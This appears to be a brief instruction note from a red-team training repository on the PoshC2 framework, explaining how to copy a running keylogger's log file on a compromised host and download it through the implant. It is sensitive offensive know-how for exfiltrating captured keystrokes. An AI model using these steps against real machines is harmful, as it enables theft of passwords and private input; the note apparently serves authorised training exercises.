ChefDandy/CTE-menu/Poshc2/instructions/Input_capture.md

 copy "fileLocation(.log)" "Sameplace newname(.log)"
 #make a copy to download after the logger has been running
+## you cant download the original filelocation if the implant is still up. will get file in use error

 Download-file "path of newname.log"
 ## Gets put into /var/poshc2/*projectname*/downloads